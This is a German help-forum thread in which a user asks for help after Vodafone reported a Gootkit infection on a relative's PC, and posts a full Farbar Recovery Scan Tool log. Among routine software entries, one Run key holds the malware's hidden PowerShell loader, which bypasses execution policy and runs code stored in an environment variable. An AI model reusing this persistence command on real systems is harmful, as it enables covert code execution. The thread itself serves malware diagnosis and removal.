Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.

Thema geschlossen
Alt 13.01.2021, 21:40   #1
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Beitrag

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Mein Schwiegervater hat von Vodafone eMails und Brief erhalten, dass eine Gootkit-Infektion dem Haushalt zugeordnet wird. Da es nur einen Windows-Rechner gibt ist die Auswahl nicht groß.

Leider hat hier McAfee nichts genutzt, auch mit CT desinfect ist keine Infektion mit den vier Virenscannern erkannt worden, durch einen Blick in die Registry in die RUN-Knoten war ich schon stutzig und fand in einem gleichartigen Thread die Bestätigung, dass da doch was schlummert.
[https://www.trojaner-board.de/200493-laut-vodafone-angeblich-gootkit-befallen-2.html]

nur der Schlüssel ist ein anderer: "acbdabdacadcfecb"

Scan mit FRST anbei, die FRST-Version mag nicht tagesaktuell sein, der Rechner war aber seitdem nicht mehr am Netz und für den ersten Durchlauf sollte es reichen...

FRST.txt
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von Peter (Administrator) auf ESPRIMO (FUJITSU ESPRIMO P910) (13-01-2021 20:42:46)
Gestartet von C:\Users\Peter\Desktop
Geladene Profile: Peter
Platform: Windows 10 Pro Version 2004 19041.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Canon Inc. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Canon Inc. -> CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(MAGIX AG) [Datei ist nicht signiert] C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(MAGIX Software GmbH -> MAGIX Software GmbH) C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\Autopilot.exe
(MAGIX Software GmbH -> MAGIX) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe
(McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\3.9.121.0\McCSPServiceHost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <2>
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_9\mcapexe.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MAT\McPvTray.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(McAfee, LLC. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MSGSDK\msgrunner.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Peter\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Download Navigator\EPSDNMON.EXE
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIRGE.EXE
(Simplitec GmbH -> simplitec GmbH) C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [644696 2007-05-15] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [1840720 2007-04-04] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-07-19] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EPPCCMON] => C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE [442936 2020-10-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [ApnUpdater] => "C:\Program Files (x86)\Ask.com\Updater\Updater.exe"
HKLM-x32\...\Run: [TrayServer] => C:\Program Files (x86)\MAGIX\Video_deluxe_MX_Plus\TrayServer_de.exe [90112 2008-08-07] (MAGIX AG) [Datei ist nicht signiert]
HKLM-x32\...\Run: [InCD] => C:\Program Files (x86)\Ahead\InCD\InCD.exe [1349120 2004-11-26] (Ahead Software AG) [Datei ist nicht signiert]
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [QMxNetworkSync] => C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe [851704 2018-11-13] (MAGIX Software GmbH -> MAGIX)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIRGE.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [NBJ] => C:\Program Files (x86)\Ahead\Nero BackItUp\NBJ.exe [1945600 2004-11-30] (Ahead Software AG) [Datei ist nicht signiert]
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPSDNMON] => C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE [346712 2020-07-27] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [acbdabdacadcfecb] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('acbdabdacadcfecb', 'User'))" <==== ACHTUNG
HKLM\...\Windows x64\Print Processors\Canon iP4500 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD92.DLL [27648 2007-05-01] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON XP-900 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBRGE.DLL [182784 2015-12-09] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {089E1D84-AEE0-488C-88A7-D6CE087096DD} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-06] (Mozilla Corporation -> Mozilla Foundation)
Task: {1AC2B76D-154F-426F-BB05-D603135A0EBE} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1C0CCB2A-DCA4-406C-B60F-91AD00DBB96D} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [736704 2020-11-03] (McAfee, LLC -> McAfee, LLC)
Task: {202BF09C-1BD8-4167-8066-25DA191AA479} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2E8498E4-689C-4F83-B839-9833BFFAE19E} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [696016 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {37662CC2-C397-464F-84B3-93206B6AFB9B} - System32\Tasks\MAGIX PC Check & Tuning 2019 (Autopilot.exe) => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\Autopilot.exe [1743944 2018-06-01] (MAGIX Software GmbH -> MAGIX Software GmbH)
Task: {4EE9E277-4D31-44C0-9FD8-5FFB1C6D5011} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {6337A68E-8EB0-456A-A818-17D9A74895CD} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_465_Plugin.exe [1504312 2020-12-08] (Adobe Inc. -> Adobe)
Task: {6E74129C-9ECF-4302-B357-66BB8DD6B3E7} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [1112576 2017-05-19] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.)
Task: {719C960A-5108-4058-AF9F-1A0C8C497CCA} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {72ABF53D-DE0C-4F2B-8B8F-1B16D29DCEDB} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {7CC7F993-3346-4FD8-A972-13FACE1F2619} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {814181A9-9584-41EF-8CA3-2AF505F4759C} - System32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)
Task: {946656EB-B6E2-4550-8811-989045BA23B8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [570240 2017-02-14] (Apple Inc. -> Apple Inc.)
Task: {99BED539-9120-4146-9180-D1E59C67DE71} - System32\Tasks\simplitec Power Suite (Tray) => C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe [1269424 2016-04-04] (Simplitec GmbH -> simplitec GmbH)
Task: {9A85E7E9-04B7-460B-B949-081BBF76EF44} - System32\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {A14A4E67-08C0-4D66-87DF-37BEED00BFC0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-12-08] (Adobe Inc. -> Adobe)
Task: {C688BB10-2A1F-451B-8035-5F692E9D7382} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [993400 2020-10-30] (McAfee, LLC -> McAfee, LLC)
Task: {CB69C3AD-49EC-42FF-9D2B-90B0C3AF74F1} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D2251CC8-0C3D-46BE-B0BB-3CBD9402AB4C} - System32\Tasks\MAGIX PC Check & Tuning 2019 => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\PCCT.exe [2467912 2018-06-01] (MAGIX Software GmbH -> MAGIX Software GmbH)
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" wurde entsperrt. <==== ACHTUNG
Task: {D8F20336-856A-4062-9B2E-C38C41B78537} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [993400 2020-10-30] (McAfee, LLC -> McAfee, LLC)
Task: {E84AA775-BBCA-46C9-A901-286E75FF8DA3} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E95FDB6A-1559-4466-B9F6-FF56A089606F} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe [4000984 2020-11-04] (McAfee, LLC -> McAfee, LLC)
Task: {F1F10BFF-3BC5-45A5-945E-7A0157B66721} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
Task: {F4362CDF-E227-43AB-9675-F299571D3DB3} - System32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)
Task: {F9E879E4-5908-487B-AF89-89F952AF276B} - System32\Tasks\simplitec Power Suite => C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe [2238128 2016-04-04] (Simplitec GmbH -> simplitec GmbH)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE:/EXE:{F9A32729-647E-4849-9E12-C9EB3BAD9726} /F:UpdateWORKGROUP\ESPRIMO$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe
Task: C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe
Task: C:\WINDOWS\Tasks\MAGIX PC Check & Tuning 2019 (Autopilot.exe).job => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\Autopilot.exe C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\ESPRIMO\Peter-MAGIX PC Check & Tuning 2019 (Autopilot.exe
Task: C:\WINDOWS\Tasks\MAGIX PC Check & Tuning 2019.job => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2019\PCCT.exe
Task: C:\WINDOWS\Tasks\simplitec Power Suite (Tray).job => C:\Program Files (x86)\simplitec\simplitec\simpliclean\ServiceProvider.exe
Task: C:\WINDOWS\Tasks\simplitec Power Suite.job => C:\Program Files (x86)\simplitec\simplitec\simpliclean\PowerSuite.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 80.69.96.12 81.210.129.4
Tcpip\..\Interfaces\{b0472145-145f-4c3d-98b1-09bcd94a9b64}: [DhcpNameServer] 80.69.96.12 81.210.129.4

Edge: 
======
Edge Profile: C:\Users\Peter\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-08]

FireFox:
========
FF DefaultProfile: q8p7ea2o.default
FF ProfilePath: C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default [2021-01-12]
FF Homepage: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps:\\\\www.ecosia.org/
FF Notifications: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps://www.epson.de
FF NewTabOverride: Mozilla\Firefox\Profiles\q8p7ea2o.default -> Disabled: web@Converter
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-01-02]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2020-12-19] [UpdateUrl:hxxps://sadownload.mcafee.com/products/SA/Win/xpi/webadvisor/update.json]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSKHKLM => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2020-11-23] [] [ist nicht signiert]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_465.dll [2020-12-08] (Adobe Inc. -> )
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2020-11-04] (McAfee, LLC -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_465.dll [2020-12-08] (Adobe Inc. -> )
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2020-11-04] (McAfee, LLC -> )
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-12-08] (Adobe Inc. -> Adobe)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1508656 2018-05-31] (McAfee, Inc. -> McAfee, Inc.)
S3 ElfoService; C:\Program Files (x86)\ElsterFormular Update Service\bin\elfoService.exe [1284360 2018-03-31] (Bayerisches Landesamt fuer Steuern -> )
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2016-11-08] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1858048 2012-01-23] (MAGIX AG) [Datei ist nicht signiert]
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [2702848 2011-04-26] (MAGIX®) [Datei ist nicht signiert]
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [97432 2007-04-13] (Canon Inc. -> ) [Datei ist nicht signiert]
S2 InCDsrv; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe [812032 2004-11-26] (Ahead Software AG) [Datei ist nicht signiert]
S2 InCDsrvR; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe [812032 2004-11-26] (Ahead Software AG) [Datei ist nicht signiert]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [958216 2020-12-18] (McAfee, LLC -> McAfee, LLC)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_9\McApExe.exe [779592 2020-11-04] (McAfee, LLC -> McAfee, LLC)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\3.9.121.0\\McCSPServiceHost.exe [2785184 2020-11-04] (McAfee, LLC -> McAfee, LLC)
S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [646248 2020-09-14] (McAfee, Inc. -> McAfee, LLC)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [646248 2020-09-14] (McAfee, Inc. -> McAfee, LLC)
R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [646248 2020-09-14] (McAfee, Inc. -> McAfee, LLC)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1589976 2020-10-30] (McAfee, LLC -> McAfee, LLC)
R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [714712 2017-06-28] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S2 PCLEPCI; C:\Windows\SysWOW64\drivers\pclepci.sys [14165 2005-02-09] (Pinnacle Systems GmbH) [Datei ist nicht signiert]
R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4215368 2020-10-19] (McAfee, LLC -> McAfee, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-11] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 61883; C:\WINDOWS\System32\drivers\61883.sys [70144 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75704 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
S3 FscEfDmi; C:\WINDOWS\System32\drivers\FscEfDmi.sys [25856 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 FscGabi; C:\WINDOWS\System32\drivers\FscGabi.sys [29952 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [218960 2020-05-26] (McAfee, LLC -> McAfee, Inc.)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2021-01-04] (SurfRight B.V. -> )
R2 McPvDrv; C:\WINDOWS\system32\drivers\McPvDrv.sys [89096 2020-05-26] (McAfee, LLC -> McAfee, LLC)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [531896 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [385464 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85944 2020-09-22] (Microsoft Windows Early Launch Anti-Malware Publisher -> McAfee, LLC)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [522168 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [1019832 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [603072 2020-09-17] (McAfee, Inc. -> McAfee LLC.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [107968 2020-09-17] (McAfee, Inc. -> McAfee LLC.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116664 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252344 2020-09-22] (McAfee, Inc. -> McAfee, LLC)
